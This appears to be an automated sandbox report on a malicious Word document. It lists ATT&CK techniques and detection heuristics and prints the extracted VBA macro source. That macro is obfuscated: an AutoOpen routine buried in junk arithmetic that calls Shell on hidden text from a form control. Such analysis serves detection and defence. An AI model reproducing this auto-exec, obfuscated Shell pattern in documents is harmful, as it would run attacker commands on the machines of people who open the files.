Verdict: MALICIOUS
Risk Score: 250

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains VBA macros, including an autoopen macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the macro attempts to execute external commands or download and run a payload. The presence of the 'SC_STR_CMD' heuristic further supports the execution of command-line tools.
Heuristics (8)
- ClamAV: Doc.Malware.Generic-6789116-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6789116-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `End Select a410646206 = Array(P4411837, t36106, M29019, Interaction.Shell(R669511167556.TextBox1, 70 - 70), S68298055) Select Case H964`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() B03852785`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5610 bytes |

SHA-256: 1594dcdac23c4ccce7457e6a19f3eb4c734c5eb273844295d4168c8c3bc25326
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "R669511167556"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
B03852785
End Sub
Attribute VB_Name = "M68922500"
Function B03852785()
On Error Resume Next
Select Case w715
Case 195583029
X0259 = J609
w1397 = Tan(o2054 - Round(R6601) / 300862149 - Tan(Q456))
q129 = C6607
F5431 = Round(N622 * Chr(96161541))
Case 285282511
R2275 = a5611
a9200 = 278827374
l6568 = X0294
b236 = Round(w9151 + Tan(i4366 + Log(149593183) - h337 / Hex(38894532)))
End Select
Select Case O6086
Case 176691007
h4660 = d572
i248 = Tan(q7821 - Round(O9478) / 91920287 - Tan(j8217))
H4031 = M183
L366 = Round(F945 * Chr(240976916))
Case 16844856
L3737 = Q166
f695 = 226133061
q0671 = d826
O7221 = Round(k0506 + Tan(U288 + Log(264481712) - C3724 / Hex(221657219)))
End Select
Select Case d013
Case 262332792
H787 = s9284
f2451 = Tan(T349 - Round(n192) / 191867258 - Tan(G612))
h5173 = i6239
p350 = Round(Y8056 * Chr(278079560))
Case 305125901
m7371 = O806
Q4397 = 284936048
B9010 = T724
L162 = Round(Z940 + Tan(J659 + Log(234136245) - i2394 / Hex(194925631)))
End Select
a410646206 = Array(P4411837, t36106, M29019, Interaction.Shell(R669511167556.TextBox1, 70 - 70), S68298055)
Select Case H964
Case 298058487
i770 = U6148
L388 = Tan(R809 - Round(B3472) / 150406317 - Tan(U0274))
F654 = I2165
R1938 = Round(n503 * Chr(188945220))
Case 118967965
T807 = U7490
K0008 = 240125079
Y9931 = i7543
C633 = Round(z364 + Tan(o352 + Log(92071163) - m687 / Hex(100962252)))
End Select
Select Case c097
Case 316055481
J1308 = r905
b5304 = Tan(f021 - Round(B4573) / 156489417 - Tan(i2015))
n384 = u3447
j732 = Round(N8884 * Chr(24308994))
Case 284087991
F241 = P951
J2732 = 82244940
Y7801 = L6002
i075 = Round(N763 + Tan(E9167 + Log(18403586) - w176 / Hex(9309268)))
End Select
Select Case i651
Case 208398389
X8290 = d3761
R6089 = Tan(D9000 - Round(b6655) / 283995392 - Tan(k501))
W3361 = E579
R5076 = Round(m959 * Chr(133378021))
Case 95939770
Y198 = T646
O765 = 295083469
t5288 = A528
i2681 = Round(o1054 + Tan(M349 + Log(47959884) - w0692 / Hex(208582407)))
End Select
Select Case s1231
Case 121717465
K7586 = N135
o713 = Tan(d5235 - Round(S061) / 288747315 - Tan(t264))
r7530 = L983
u560 = Round(J6991 * Chr(156412198))
Case 295065868
X263 = I191
n496 = 208693067
z571 = D260
k7857 = Round(q299 + Tan(w872 + Log(65635896) - Q8687 / Hex(333656876)))
End Select
End Function
Attribute VB_Name = "U27411041501"
Attribute VB_Name = "v162431780460"
Attribute VB_Name = "i15589039543"
Attribute VB_Name = "C33117811"
Attribute VB_Name = "Z8481611854563"
Attribute VB_Name = "k88016588150397"
Attribute VB_Name = "L166804288887"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h13448047"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "B2998430"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "V2097988115786"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j903807892"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w45884303579276"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "S43157418255"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False